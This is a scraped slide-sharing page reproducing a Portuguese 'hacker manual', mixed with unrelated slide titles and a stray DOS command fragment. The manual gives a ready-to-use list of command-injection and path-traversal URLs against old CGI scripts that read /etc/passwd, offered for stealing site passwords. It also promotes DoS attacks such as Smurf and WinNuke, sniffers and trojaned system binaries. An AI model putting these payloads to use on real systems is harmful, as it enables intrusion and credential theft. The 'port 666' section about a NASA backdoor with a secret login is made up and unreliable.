Comando DISKCOPY O comando DISKCOPY copia o conteúdo de um disco flexível para
outro, sendo que eles devem ter o mesmo tamanho e densidade. Deve ser usado da
seguinte maneira: diskcopy [drive de origem:] [drive de destino:] [opções] (Sem colchetes),
sendo que não é necessária a utilização de opções caso você não queira.

Opções: /v – Verifica os arquivos copiados após a cópia.

Comando XCOPY O comando xcopy copia arquivos de um ou mais subdiretórios. Também
pode copiar os subdiretórios, mas não copia arquivos de sistema ou ocultos, devendo ser
usado da seguinte maneira: xcopy [drive:][caminho] arquivo(s) de destino [opções] (Sem
colchetes), sendo que não é necessária a utilização de opções caso você não queira.

Opções: /d - Copia arquivos que foram modificados a partir de uma certa data. /p - Pede
confirmação para cópia de cada arquivo. /s - Copia diretórios e subdiretórios (Não copia
pastas vazias). /e/s - Copia os subdiretórios mesmo que estejam vazios. /v - Verifica os

                                              64
Manual do hacker
Manual do hacker
Manual do hacker
Manual do hacker

Mais conteúdo relacionado

Destaque

Anexos5ano 120704114933-phpapp01
Anexos5ano 120704114933-phpapp01Anexos5ano 120704114933-phpapp01
Anexos5ano 120704114933-phpapp01Isabela Maggot
 
Советы по эффективному управлению email
Советы по эффективному управлению emailСоветы по эффективному управлению email
Советы по эффективному управлению emailВячеслав Марчков
 
Case study of Failure analysis of 175mm gun tube of M107 Battle Tank
Case study of Failure analysis of 175mm gun tube of M107 Battle TankCase study of Failure analysis of 175mm gun tube of M107 Battle Tank
Case study of Failure analysis of 175mm gun tube of M107 Battle TankSum K
 
Smartphone's and how to install applications
Smartphone's and how to install applicationsSmartphone's and how to install applications
Smartphone's and how to install applicationsxxjanetxx
 
EESTEC Summer School 2012 - Group 9 - kuma
EESTEC Summer School 2012 - Group 9 - kumaEESTEC Summer School 2012 - Group 9 - kuma
EESTEC Summer School 2012 - Group 9 - kumaEESTEC LC Trieste
 
Reliv Opportunity Slides 2012
Reliv Opportunity Slides 2012Reliv Opportunity Slides 2012
Reliv Opportunity Slides 2012mrdaps
 
CREAConstructionEvent: Pas2030 info
CREAConstructionEvent: Pas2030 infoCREAConstructionEvent: Pas2030 info
CREAConstructionEvent: Pas2030 infoLauraCBEN
 
Anexos4ano 120702144514-phpapp01
Anexos4ano 120702144514-phpapp01Anexos4ano 120702144514-phpapp01
Anexos4ano 120702144514-phpapp01Isabela Maggot
 
Times 6 auto
Times 6 autoTimes 6 auto
Times 6 autoWorserbay
 
Division repeated subtraction
Division repeated subtractionDivision repeated subtraction
Division repeated subtractionWorserbay
 
Tallychart pictograms
Tallychart pictogramsTallychart pictograms
Tallychart pictogramsWorserbay
 

Destaque (13)

Anexos5ano 120704114933-phpapp01
Anexos5ano 120704114933-phpapp01Anexos5ano 120704114933-phpapp01
Anexos5ano 120704114933-phpapp01
 
Советы по эффективному управлению email
Советы по эффективному управлению emailСоветы по эффективному управлению email
Советы по эффективному управлению email
 
Case study of Failure analysis of 175mm gun tube of M107 Battle Tank
Case study of Failure analysis of 175mm gun tube of M107 Battle TankCase study of Failure analysis of 175mm gun tube of M107 Battle Tank
Case study of Failure analysis of 175mm gun tube of M107 Battle Tank
 
Smartphone's and how to install applications
Smartphone's and how to install applicationsSmartphone's and how to install applications
Smartphone's and how to install applications
 
EESTEC Summer School 2012 - Group 9 - kuma
EESTEC Summer School 2012 - Group 9 - kumaEESTEC Summer School 2012 - Group 9 - kuma
EESTEC Summer School 2012 - Group 9 - kuma
 
Reliv Opportunity Slides 2012
Reliv Opportunity Slides 2012Reliv Opportunity Slides 2012
Reliv Opportunity Slides 2012
 
CREAConstructionEvent: Pas2030 info
CREAConstructionEvent: Pas2030 infoCREAConstructionEvent: Pas2030 info
CREAConstructionEvent: Pas2030 info
 
Origin of life
Origin of lifeOrigin of life
Origin of life
 
Anexos4ano 120702144514-phpapp01
Anexos4ano 120702144514-phpapp01Anexos4ano 120702144514-phpapp01
Anexos4ano 120702144514-phpapp01
 
Times 6 auto
Times 6 autoTimes 6 auto
Times 6 auto
 
Division repeated subtraction
Division repeated subtractionDivision repeated subtraction
Division repeated subtraction
 
Feel the quality UCR Conference 2012
Feel the quality UCR Conference 2012Feel the quality UCR Conference 2012
Feel the quality UCR Conference 2012
 
Tallychart pictograms
Tallychart pictogramsTallychart pictograms
Tallychart pictograms
 

Semelhante a Manual do hacker

Interceptar palavras passes de páginas web em uma rede sem fios
Interceptar palavras passes de páginas web em uma rede sem fiosInterceptar palavras passes de páginas web em uma rede sem fios
Interceptar palavras passes de páginas web em uma rede sem fiosDerek Budde
 
Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploitRoberto Soares
 
Nmap Avaliando Rede Em Ambiente Linux
Nmap  Avaliando Rede Em Ambiente LinuxNmap  Avaliando Rede Em Ambiente Linux
Nmap Avaliando Rede Em Ambiente Linux987123987123
 
Ferramentas de ataques
Ferramentas de ataquesFerramentas de ataques
Ferramentas de ataquesCarlos Veiga
 
3929 linux passo a passo 1
3929 linux passo a passo 1 3929 linux passo a passo 1
3929 linux passo a passo 1 Márcio Roberto
 
Compartilhando Internet Via Rádio entre m servidor linux e clientes windows
Compartilhando Internet Via Rádio entre m servidor linux e clientes windowsCompartilhando Internet Via Rádio entre m servidor linux e clientes windows
Compartilhando Internet Via Rádio entre m servidor linux e clientes windowsFelipe Santos
 
I Workshop de Redes do Iespes
I Workshop de Redes do IespesI Workshop de Redes do Iespes
I Workshop de Redes do Iespesluizfelipemz
 
Backend do Iot com rethinkdb e python
Backend do Iot com rethinkdb e pythonBackend do Iot com rethinkdb e python
Backend do Iot com rethinkdb e pythonAfonso Coutinho
 
InterCon 2016 - Backend do IoT com RethinkDB e Python
InterCon 2016 - Backend do IoT com RethinkDB e PythonInterCon 2016 - Backend do IoT com RethinkDB e Python
InterCon 2016 - Backend do IoT com RethinkDB e PythoniMasters
 
Palestra IPv6 Estácio Parangaba - 10-05
Palestra IPv6 Estácio Parangaba - 10-05Palestra IPv6 Estácio Parangaba - 10-05
Palestra IPv6 Estácio Parangaba - 10-05Silvana Correa
 
H4dummies (translated to portuguese)
H4dummies (translated to portuguese)H4dummies (translated to portuguese)
H4dummies (translated to portuguese)Alvaro Gomes
 
Resolução Parcial - Redes de Computadores - Kurose 6ª Edição
Resolução Parcial - Redes de Computadores - Kurose 6ª EdiçãoResolução Parcial - Redes de Computadores - Kurose 6ª Edição
Resolução Parcial - Redes de Computadores - Kurose 6ª EdiçãoRonildo Oliveira
 
Esta atividade compreende a análise da comunicação a partir dos canais intern...
Esta atividade compreende a análise da comunicação a partir dos canais intern...Esta atividade compreende a análise da comunicação a partir dos canais intern...
Esta atividade compreende a análise da comunicação a partir dos canais intern...2m Assessoria
 

Semelhante a Manual do hacker (20)

Interceptar palavras passes de páginas web em uma rede sem fios
Interceptar palavras passes de páginas web em uma rede sem fiosInterceptar palavras passes de páginas web em uma rede sem fios
Interceptar palavras passes de páginas web em uma rede sem fios
 
Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploit
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
Analise de Logs
Analise de LogsAnalise de Logs
Analise de Logs
 
Nmap Avaliando Rede Em Ambiente Linux
Nmap  Avaliando Rede Em Ambiente LinuxNmap  Avaliando Rede Em Ambiente Linux
Nmap Avaliando Rede Em Ambiente Linux
 
Ferramentas de ataques
Ferramentas de ataquesFerramentas de ataques
Ferramentas de ataques
 
3929 linux passo a passo 1
3929 linux passo a passo 1 3929 linux passo a passo 1
3929 linux passo a passo 1
 
Compartilhando Internet Via Rádio entre m servidor linux e clientes windows
Compartilhando Internet Via Rádio entre m servidor linux e clientes windowsCompartilhando Internet Via Rádio entre m servidor linux e clientes windows
Compartilhando Internet Via Rádio entre m servidor linux e clientes windows
 
I Workshop de Redes do Iespes
I Workshop de Redes do IespesI Workshop de Redes do Iespes
I Workshop de Redes do Iespes
 
Backend do Iot com rethinkdb e python
Backend do Iot com rethinkdb e pythonBackend do Iot com rethinkdb e python
Backend do Iot com rethinkdb e python
 
InterCon 2016 - Backend do IoT com RethinkDB e Python
InterCon 2016 - Backend do IoT com RethinkDB e PythonInterCon 2016 - Backend do IoT com RethinkDB e Python
InterCon 2016 - Backend do IoT com RethinkDB e Python
 
Buffer overflow group
Buffer overflow groupBuffer overflow group
Buffer overflow group
 
Palestra IPv6 Estácio Parangaba - 10-05
Palestra IPv6 Estácio Parangaba - 10-05Palestra IPv6 Estácio Parangaba - 10-05
Palestra IPv6 Estácio Parangaba - 10-05
 
H4dummies (translated to portuguese)
H4dummies (translated to portuguese)H4dummies (translated to portuguese)
H4dummies (translated to portuguese)
 
Ntop
NtopNtop
Ntop
 
Resolução Parcial - Redes de Computadores - Kurose 6ª Edição
Resolução Parcial - Redes de Computadores - Kurose 6ª EdiçãoResolução Parcial - Redes de Computadores - Kurose 6ª Edição
Resolução Parcial - Redes de Computadores - Kurose 6ª Edição
 
Protocolos de Redes
Protocolos de RedesProtocolos de Redes
Protocolos de Redes
 
Protocolos
ProtocolosProtocolos
Protocolos
 
Esta atividade compreende a análise da comunicação a partir dos canais intern...
Esta atividade compreende a análise da comunicação a partir dos canais intern...Esta atividade compreende a análise da comunicação a partir dos canais intern...
Esta atividade compreende a análise da comunicação a partir dos canais intern...
 
Introdução ao Ssh
Introdução ao SshIntrodução ao Ssh
Introdução ao Ssh
 

Manual do hacker

  • 1. manual do hacker :) =====INVASÃO PELA PORTA 666===== MAS O QUE É ISSO? É UMA PORTA QUE SÓ PODERIA SER USADA PELO GOVERNO AMERICANO E NASA, TANTO QUE ELES COMUNICAM-SE POR ESTA PORTA. BOM, PARA SE CONECTAR POR ELA NÃO É NADA FÁCIL, MAS PRECISA DE ALGUNS AJUSTES, É MAIS UMA COISA PARA PEGAR COISAS NA CASA DE UM AMIGO SEM ELE FICAR SABENDO. O QUE VOCÊ PRECISA: VOCÊ PRECISA DE UM PROGRAMA CHAMADO AABOUT (www.sites.uol.com.br/HACKERSBRASIL), E PEGUE ESTE PROGRAMA. VOCÊ PRECISA DE UM PROGRAMA PARA ACESSAR TELNET. PARA QUEM NÃO SABE ESTE PROGRAMA FICA NO DIRETÓRIO WINDOWS. PRONTO? JÁ TENHO TUDO AGORA? AGORA É SÓ CHAMAR UM AMIGO PARA UMA CONVERSA PELO ICQ, OU PELO CHAT, ELE TAMBÉM DEVE TER AS DUAS FERRAMENTAS. DEPOIS DE CHAMÁ-LO, OS DOIS DEVEM EXECUTAR O AABOUT. DEPOIS, É SÓ ABRIR O TELNET E NO HOST COLOCAR O IP DINÂMICO DA VÍTIMA E SE CONECTAR A PORTA 666 E NO LOGIN A PALAVRA GR!. O PONTO DE EXCLAMAÇÃO DEVE PERMANECER. PRONTO! AGORA VOCÊ ESTARÁ EM UM PROMPT! É SÓ DAR UM DIR, E VOCÊ TEM TOTAL CONTROLE SOBRE O PC DO CARA! TANTO CONTROLE QUE PODE CHEGAR A DAR UM FORMAT C: , POR ISSO, SÓ FAÇA ISSO COM SEUS AMIGOS. =====SPOOFING===== PARA QUE VOCÊ COMPREENDA ESTE TEXTO É NECESSÁRIO QUE VOCÊ TENHA ALGUNS CONHECIMENTOS SOBRE UNIX E PROTOCOLOS TCP/IP. ANTES DE MAIS NADA, O SPOOFING NÃO É UM ATAQUE, E SIM PARTE DE UM. LOGO, O 1
  • 2. SPOOFING É UMA ESPÉCIE DE TÉCNICA DE ATAQUE, DO QUAL O HACKER PODE MASCARAR SEU ENDEREÇO IP OU DNS, POR EXEMPLO, DIZENDO AO SISTEMA QUE ELE VAI ATACAR, QUE ELE É CONFIÁVEL. ISSO OCORRE POR QUE AS COMUNICAÇÕES ENTRE COMPUTADORES NA INTERNET SE BASEIA NESTES ENDEREÇOS "CONFIÁVEIS" PARA TROCAREM INFORMAÇÕES. UMA MÁQUINA A PODE MANTER UMA COMUNICAÇÃO COM UMA MÁQUINA B SEM QUE SEJA NECESSÁRIO VERIFICAR TODA HORA SE A INFORMAÇÃO É AUTÊNTICA ENTRE ELAS. O HACKER, ENTÃO, PÕE UMA ESPÉCIE DE DISFARCE EM SEU PC, DIZENDO PARA A MÁQUINA A QUE ELE É A MÁQUINA B. ASSIM, A MÁQUINA A VAI ACEITAR TODOS OS SEUS COMANDOS E, ENTÃO, O CARA PODE FAZER TUDO O QUE QUISER NELA. OS TIPOS MAIS COMUNS DE SPOOFING SÃO: IP-SPOOFING, DNS-SPOOFING, WEB-SPOOFING, E- MAIL-SPOOFING ENTRE OUTROS. COMO FOI MENCIONADO ANTERIORMENTE, NO SPOOFING O INVASOR TOMA A IDENTIDADE DE HOST CONFIÁVEL. EM UMA REDE UNIX PODEMOS CONFIGURAR HOSTS CONFIÁVEIS. SE UMA MÁQUINA UNIX CRIA EM SEU DIRETORIO/HOME UM ARQUIVO CHAMADO RHOSTS COM OS NOMES DE HOSTS, LOGO QUALQUER USUÁRIO QUE TENHA O USER ID QUE VOCÊ COLOCOU NESTE ARQUIVO PODE LOGAR-SE NA SUA CONTA USANDO O RLOGIN. O RLOGIN É UM PROTOCOLO BASEADO EM CLIENTE /SERVIDOR SIMPLES, QUE USA O TCP COMO PROTOCOLO DE COMUNICAÇÃO. O RLOGIN PERMITE AO USUÁRIO LOGAR-SE REMOTAMENTE DE UM HOST AO OUTRO. SE A MÁQUINA ALVO CONFIAR NA MÁQUINA DESTE USUÁRIO, O RLOGIN PERMITIRÁ A CONVENIÊNCIA DE NÃO PEDIR PASSWORD. ELA SOMENTE IRÁ AUTETICAR O CLIENTE VIA ENDEREÇO IP. ENTÃO PODEMOS EXECUTAR COMANDOS REMOTOS COMO RSH, DESDE QUE DEDE QUE AQUELES HOSTS "CONFIÁVEIS" ESTEJAM LISTADOS NO RHOSTS, SEM PEDIR PASSWORD. OUTRA POSSIBILIDADE É LISTAR NOMES DE HOSTS NO ARQUIVO /ETC/HOSTS.EQUIV. NESTE CASO, QUALQUER USUÁRIO DAS MÁQUINAS LISTADAS PODE TAMBÉM LOGAR-SE NO HOST LOCAL SEM UMA PASSWORD. THREE-WAY HADSHAKE: QUANDO UM HOST ENVIA UMA MENSAGEM A UM OUTRO HOST ESTE PODE SER DIVIDIDO EM UM NÚMERO DE SEGMENTOS E REDICIONADO AO HOST DESTINO POR TCP. O IP SOMENTE SE ENCARREGADE ROTEÁ-LO. QUANDO UMA APLICAÇÃO EM UM CLIENTE QUER ALCANÇAR A OUTRA EM UM SERVIDOR, DEVE CONHECER A O IP DA MÁQUINA-DESTINO E Ó NÚMERO DA PORTA TCP DESIGNADO À APLICAÇÃO, E DECIDIR ENTÃO A CONEXÃO DESTINO. (CONEXÃO-DESTINO=DIREÇÃO IP+PORTA TCP). PARA ESTABELECER UMA CONEXÃO, O TCP UTILIZA UM PROCEDIMENTO DENOMINADO "3- 2
  • 3. WAY HANDSHAKE". NESTE PROCESSO, 3 MENSAGENS (SYN, SYN/ACK y ACK) SÃO REQUERIDAS PARA ESTABELECER A CONEXÃO. ENTRE A INFORMAÇÃO INTERCAMBIADA ESTÁ A DIREÇÃO DE CADA MÁQUINA E O NÚMERO DE SEQUENCIA INICIAL (#SI) QUE AMBAS UTILIZARÃO PARA ESTABELECER A COMINICAÇÃO. ESTES NÚMEROS SÃO EXCLUSIVOS PARA A COMUNICAÇÃO ENTRE ESSAS DUAS MÁQUINAS, E SE BASEIAM NA HORA DO RELÓGIO INTERNO DO SISTEMA. UMA VEZ ABERTA A CONEXÃO. AS DUAS MÁQUINAS JÁ "AUTENTICADAS", ESTÃO PRONTAS PARA TROCAR DADOS. =====ATAQUE POR MONITORAÇÃO===== ATAQUES POR MONITORAÇÃO SÃO BASEADOS EM SOFTWARE DE MONITORAÇÃO DE REDE CONHECIDO COMO SNIFFER, INSTALADO PELOS INVASORES. O SNIFFER GRAVA OS PRIMEIROS 128 BYTES DE CADA SESSÃO LOGIN, TELNET E FTP SESSION VISTA NAQUELE SEGMENTO DE REDE LOCAL COMPROMETENDO TODO O TRÁFEGO DE/PARA QUALQUER MÁQUINA NAQUELE SEGMENTO, BEM COMO O TRÁFEGO QUE PASSAR POR AQUELE SEGMENTO. OS NOMES CAPTURADOS INCLUEM O HOST DESTINO, O USERNAME E A PASSWORD. A INFORMAÇÃO É GRAVADA NUM ARQUIVO POSTERIORMENTE RECUPERADO PELO INVASOR PARA TER ACESSO A OUTRAS MÁQUINAS. EM MUITOS CASOS OS INVASORES OBTEM ACESSO INICIAL AOS SISTEMAS USANDO UMA DAS SEGUINTES TÉCNICAS: OBTEM O ARQUIVO DE PASSWORDS VIA FTP EM SISTEMAS IMPROPRIAMENTE CONFIGURADOS; OBTEM O ARQUIVO DE PASSWORDS DE SISTEMAS RODANDO VERSÕES INSEGURAS DO NIS; OBTEM ACESSO AO SISTEMA DE ARQUIVOS LOCAIS VIA PONTOS EXPORTADOS PARA MONTAGEM COM NFS, SEM RESTRIÇÕES; USAM UM NOME DE LOGIN E PASSWORD CAPTURADA POR UM SNIFFER RODANDO EM OUTRO SISTEMA. UMA VEZ NO SISTEMA, OS INVASORES OBTEM PRIVILÉGIOS DE ROOT EXPLORANDO VULNERABILIDADES CONHECIDAS, TAÇ COMO RDISTSUN SPARC INTEGER DIVISION E ARQUIVOS UTMP POSSÍVEIS DE ESCRITA POR TODO MUNDO OU USANDO UMA PASSWORD DE ROOT CAPTURADA. ELES ENTÃO INSTALAM O SOFTWARE SNIFFER, REGISTRANDO A INFORMAÇÃO CAPTURADA NUM ARQUIVO INVISÍVEL. ADICIONALMENTE, ELES INSTALAM CAVALOS DE TRÓIA EM SUBSTITUIÇÃO E UMA OU MAIS DENTRE OS SEGUINTES ARQUIVOS DE SISTEMA, PARA OCULTAR SUA PRESENÇA: /BIN/LOGIN /USR/ETC/IN.TELNETD 3
  • 4. /USR/KVM/PS /USR/UCB/NETSTAT ENTENDA O BARRAMENTO DO MICRO ISA- O BARRAMENTO SURGIU COM OS XT´S, O ISA ORIGINAIS ERAM DE 8 BITS E RODAVAM A 4,77 MHZ. COM O ADVENTO DOS AT, VAIO O ISA DE 16 BITS QUE OPERAVAM A 8 MHZ., UTILIZADOS ATÉ HOJE. POR EXEMPLO, AS FAX-MODEM POSSUEM BARRAMENTO ISA DE 8 BITS. OS BARRAMENTOS UTILIZADOS ATUALMENTE SÃO O ISA, VESA E PCI, ESSES DOIS ÚLTIMOS SÃO O QUE SE CHAMA DE LOCAL BUS. SÃO CAHMADOS DE LOCAL BUS POR FUNCIONAREM EM CONEXÃO DIRETA COM A CPU. VESA- HOJE MUITO POPULAR, NÃO CHEGA A CONSTITUIR UM BARRAMENTO NOVO, ELE É BASICAMENTE UM ISA ALTERADO, E É UM BARRAMENTO RÁPIDO, DE 32 BITS E FREQÜÊNCIA DE FUNCIONAMENTO DE 33 MHZ. A VELOCIDADE DE TRANSMISSÃO É DE 130MBITS/S. =====ROUBANDO SENHAS DE SITES===== ESTAS SENHAS PERMITEM QUE VOCÊ ENTRE EM SITES RESTRITOS QUE NECESSITAM DE SENHA PARA ENTRAR. (NÃO FUNCIONA EM TODOS) phf http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd php.cgi http://xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd test-cgi http://xxx.xxx.xxx/cgi-bin/test- 4
  • 5. cgi?/etc/* query http://xxx.xxx.xxx/cgi-bin/query?%0a/bin/cat%20/etc/passwd faxsurvey http://xxx.xxx.xxx/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd htmlscript http://xxx.xxx.xxx/cgi-bin/htmlscript?../../../../etc/passwd webdist.cgi http://xxx.xxx.xxx/cgi- bin/webdist.cgi?distloc=;cat%20/etc/passwd nph-test-cgi http://xxx.xxx.xxx/cgi-bin/nph- test-cgi?/etc/* echo http://xxx.xxx.xxx/cgi-bin/echo?%0Acat%20/etc/passwd view-source http://xxx.xxx.xxx/cgi-bin/view-source?../../../../../etc/passwd pfdisplay http://xxx.xxx.xxx/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd campas http://xxx.xxx.xxx/cgi- bin/campas?%0acat%0a/etc/passwd%0a wrap http://xxx.xxx.xxx/cgi- bin/wrap?/../../../../../etc whatever http://xxx.xxx.xxx/cgi-bin/handler/whatever;cat /etc/passwd|? data=Download xenolith http://xxx.xxx.xxx/cgi-bin/handler/xenolith;cat /etc/passwd/| ?data=Download Substitua o xxx.xxx.xxx pelo endereço do site DoS PARA COMEÇAR A ESCREVER SOBRE DoS, NADA MELHOR DO QUE EXPLICAR O QUE É ISSO. O LAMMER VEM E DIZ: " EU SEI! É UM SISTEMA OPERACIONAU SUPER LEGAL CRIADU PELU BIU GAYTIS, PAI DU MERCADU DI SOFITIWARE! I EU SEI TUDU DELI!" NÃO!!!!! O HACKING NÃO SE LIMITA A MERDAS COMO DOS LAMMAH! NA VERDADE NEM SEI SE CHEGA A INCLUIR TAMANHA BOSTA. ASSIM, DOS E DoS SÃO COISAS DIFERENTES. ENQUANTO DOS QUER DIZER "DISK OPERATING SYSTEM", DoS QUER DIZER "DENIAL OF SERVICE". DoS É UM ATAQUE MUITO ÚTIL, E COMO O PRÓPRIO NOME DIZ, NEGA UM DETERMINADO TIPO DE SERVIÇO AOS USUÁRIOS, ISTO É, IMPEDE QUE ACESSEM UM DETEMINADO SERVOÇO DO HOST. PODE-SE TER COMO ALVO DE UM DoS DESDE O MAIS BAIXO LAYERDO TCP/IP ATÉ STACK ATÉ O LAYER DE APLICAÇÃO, TRAVANDO O IRC DO CARA, POR EXEMPLO. COMO VEREMOS AQUI, NÃO EXISTE UM ATAQUE DE DoS, E SIM VÁRIOS TIPOS DE ATAQUES QUE PODEM SER CONSIDERADOS COMO DoS, CADA UM DELES ATACANDO UMA PARTE DO TCP/IP E DOS SEUS SUBPROTOCOLOS. A UTILIDADE? VÁRIAS! O PRÓPRIO MAIL BOMB PODE SER CLASSIFICADO COMO UM ATAQUE DE DoS, POIS ELE ENCHE A CAIXA DO MANÉ DE MENSAGENS IMPDINDO QUE ELE CHEQUE OU TALVEZ ATÉ TRAVANDO O POP3. OUTRO EXEMPLO É O WINNUKE, QUE ATACA UM DRIVER DO TCP/IP E FAZ COISAS QUE VARIAM DE CAIR A CONEXÃO DO CARA ATÉ RESETAR O MICRO DO SUJEITO. ASSIM, O DoS SURGE COMO UM NOVO CAMPO A SER EXPLORADO, INVESTIGANDO NÃO SOMENTE FUROS DE SEGURANÇA MAS SIM FRAQUEZAS NA MANEIRA COM QUE OS PROTOCOLOS E OS SISTEMAS OPERACIONAIS LIDAM COM 5
  • 6. DETERMINADOS TIPOS E QUANTIDADES DE DADOS. SE VOCÊ AINDA NÃO TOMOU UMA NOÇÃO CLARA DO QUE SERIA DoS, OS ATAQUES ABAIXO IRÃO AJUDÁ-LO A ENTENDER. WINNUKE OS AFETADOS: WIN 95 (INCLUINDO OSR2), E WINDOWS NT 4.0. QUANDO O TITIO BILL GATE$ CRIOU WINDOWS 95 E CIA, PENSOU EM COMO SERIA A IMPLANTAÇÃO DO COMPARTILHAMENTO DE ARQUIVOS, DADA ATRAVÉS DE UM PROTOCOLO CHAMADO NETBIOS. QUERIA QUE FOSSE ALGO PRÁTICO, CONSTANTE E SEM DIFICULDADES PARA O USUÁRIO FINAL. POR ISSO, RESERVOU AO NETBIOS A PORTA TCP/IP 139 E DEIXOU ELE ABERTA EM TODOS OS SISTEMAS, COMO UM DEFALT. ACONTECE QUE ACABARAM DESCOBRINDO QUE ERA POSSÍVEL FAZER UM ATAQUE DE DoS BEM INTERESSANTE COM ESSA PORTA 139. ESTE ATAQUE CONSISTE EM MANDAR UMA MENSAGEM OOB (OUT OF BAND) PARA ESSA PORTA E COMO O RWINDOWS NÃO SABE LIDAR COM ESSE TIPO DE MENSAGEM, OCORRE UM ERRO NO TCP/IP DO SEU RWINDOWS, FAZENDO APARECER PORTANTO, A FAMOSA TELA AZUL COM AS MENSAGENS DE ERRO DE DRIVER. EMBORA SEJA MAIS COMUM WINNUKAR UMA PESSOA PELA PORTA 139, ISSO PODE SER FEITO POR OUTRAS PORTAS RELACIONADAS AO NETBIOS (COMO 135 E 137), DESDE QUE ESTEJAM "ESCUTANDO". LAND OS AFETADOS- WIN95 (INCLUINDO OSR2), WIN NT 4.0 E BSDI 2.1 E OUTROS ENTRE OUTROS, O LINUX NÃO É AFETADO A PARTIR DO KERNEL 2.0.30 ESSE ATAQUE USA UM MECANISMO INTERESSANTE, PORÉM NÃO CAUSA DANOS CONSIDERÁVEIS, SÓ CAUSANDO UMA CERTA LENTIDÃO POR ALGUNS INSTANTES. É O SEGUINTE: VOCÊ MANDA VÁRIOS PACOTES DE TCP/IP COM A FLAG SYN, SPOOFADOS COM O IP DO PRÓPRIO ALVO. A FLAG SYN É A FLAG DO TCP/IP RESPNSÁVEL POR INICIAR UMA CONEXÃO TCP/IP, CONHECIDA COMO TRHEE WAY HANDSHAKING. ASSIM, AO RECEBER 6
  • 7. UMA FLAG SYN, O TCP/IP RESPONDE O CLIENTE IMEDIATAMENTE COM UM PACOTE COM AS FLAGS SYN E ACK. O QUE O LAND FAZ É O SEGUINTE: COMO AS SYN REQUESTS ESTÃO SPOOFADAS COM O IP DO PRÓPRIO ALVO, ESSE ALVO ACABA MANDANDO AS SYN ACK´S PARA ELE MESMO, CAUSANDO UMA LENTIDÃO ENORME NO SISTEMA E CHEGANDO ATÉ A TRAVÁ-LO EM ALGUMAS VARIAÇÕES. SIMPLES E EFICIENTE. TEARDROP AS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT E LINUX ESSE ATAQUE TAMBÉM É MUITO FAMOSO. ELE EXPLORA UM BUG PRESENTE NO LAYER IP (RELACIONADO À FRAGMENTAÇÃO DE DATAGRAMAS IP) DO TCP/IP STACK DOS DIFERENTES OS´S CITADOS ACIMA. QUANDO A VÍTIMA RECEBE DETERMINADOS DADOS, SEU SISTEMA PODE CONGELAR REPENTINAMENTE SUA CONEXÃO CAI E NO CASO DE SISTEMAS WINDOWS PODE ATÉ SER QUE APAREÇA A FAMOSA E TEMIDA TELA AZUL, ACUSNDO UM ERRO. ENTRETANTO, ESSE BUG NÃO CAUSA GRAVES DANOS E UM SIMPLES REBOOT IRÁ NORMALIZAR TUDO. VOCÊ ENCONTRARÁ MAIORES DETALHES NA BOA E VELHA ROOTSHELL (HTTP://WWW.ROOTSHELL.COM). É SÓ DAR UM SEARCH. SSPING/JOLT OS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT 4.0 E ANTIGAS VERSÕES DE MAC’OS. ESSE EXPLOITS DESENTERRA O VELHO PROBLEMA DOS SISTEMAS WINDOWS COM O PROTOCOLO ICMP, E MAIS ESPECIFICAMENTE COM A FUNÇÃO PING. O QUE O SSPING FAZ É QUE ELE CRIA PACOTES DE DADOS ICMP MUITO GRANDES (MAIS QUE O PERMITIDO), OS FRAGMENTA EM VÁRIAS PARTES (PARA PODER ENVIAR) E OS ENVIA DE UMA VEZ SÓ PARA O ALVO. QUANDO O ALVO PEGA ESSES FRAGMENTOS E TENTA REMONTAR OS PACOTES ORIGINAIS ELE TRAVA E É PRECISO REINICIÁ-LO. 7
  • 8. BONK/BOINK OS AFETADOS- WIN 95 (INCLUINDO OSR2) E WIN NT 4.0. ESSES DOIS SÃO NA VERDADE VARIAÇÕES DO CONHECIDO TEARDROP. O BONK SERIA UM TEARDROP QUE TRAVA MESMO MÁQUINAS PATCHEADAS. JÁ O BOINK É UMA VERSÃO MAIS AVANÇADA DO BONK E PERMITE QUE PORTAS UDP SEJAM USADAS COMO ALVO. ESSES FATOS SE BASEIAM NO FATO DE QUE O WINDOWS PODE TRAVAR SE RECEBER MUITOS PACOTES UDP CORROMPIDOS. ASSIM O PROGRAMA MANDA VÁRIOS DATAGRAMAS IP FRAGMENTADOS E NO COMPUTADOR ALVO SÃO REMONTADOS EM PACOTES UDP INVÁLIDOS ATRAVÉS DO "OVERLAPPING BUG", TAMBÉM MUITO EXPLORADO NO TEARDROP. SMURF OS AFETADOS- TODOS. ISSO MESMO! VOCÊ OUVIU BEM! T-O-D-O-S! AGORA CHEGOU A HORA DE FALAR SOBRE UM DOS ATAQUES MAIS EFICIENTES E LOUCOS. O SMURF! A SIMPLICIDADE DESSE ATAQUE CHEGA A IMPRESSIONAR QUANDO SE OBSERVA OS DANOS QUE PODEM SER CAUSADOS. ENTRE TODOS OS DoS DESCRITOS ATÉ AQUI, ESSE É O PRIMEIRO QUE NÃO ENVOLVE APENAS DOIS COMPUTADORES: O INVASOR E A VÍTIMA, MAIS SIM CENTENAS, ATÉ MILHARES DE HOSTS, CONTRA APENAS UM SÓ!! DEVASTADOR!! O QUE O SMURF FAZ É QUE ELE MANDA UM BROADCAST DE PACOTES ICMP (MANDA PARA VÁRIOS ENDEREÇOS, CONTIDOS EM UMA LISTA A SER CRIADA POR VOCÊ) SÓ QUE COM O ENDEREÇO DE ORIGEM SPOOFADO COM O IP DA VÍTIMA. ASSIM, TODOS OS COMPUTADORES QUE FORAM PINGADOS IRÃO RESPONDER UNICAMENTE PARA ESSE COMPUTADOR VÍTIMA. POR EXEMPLO: SE VOCÊ MANDA UM PING PRA 1000 COMPUTADORES E ESSE PING TEM COMO IP DE ORIGEM O IP DA VÍTIMA, ESSE COITADO IRÁ RECEBER NADA MAIS NADA MENOS DO QUE 1000 PACOTES ICMP DE RESPOSTA!!!!! QUASE AO MESMO TEMPO!!! ISSO SIMPLESMENTE DETONA COM O MICRO DO CARA E TRAVA ELE TOTALMENTE, TENDO QUE SER REINICIADO. 8
